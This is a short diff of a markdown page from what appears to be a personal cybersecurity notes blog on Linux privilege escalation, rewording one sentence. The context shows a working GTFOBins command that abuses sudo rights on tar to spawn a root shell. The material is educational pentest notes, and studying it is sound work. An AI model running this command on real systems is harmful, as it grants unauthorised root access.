QuentinRa/blog.quentinra.dev/cyber/privilege-escalation/linux/index.md

 > There is a local version of [gtfo in Python](https://github.com/t0thkr1s/gtfo) (96 ⭐, 2021).
 </div><div>

 Example: you can only run `tar` using `sudo`.
-Run the command below from [GTFOBins](https://gtfobins.github.io/gtfobins/tar/#sudo), and you will get a bash as root.
+Run the command below from [GTFOBins](https://gtfobins.github.io/gtfobins/tar/#sudo), and you will get a root shell.

 ```bash
 $ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh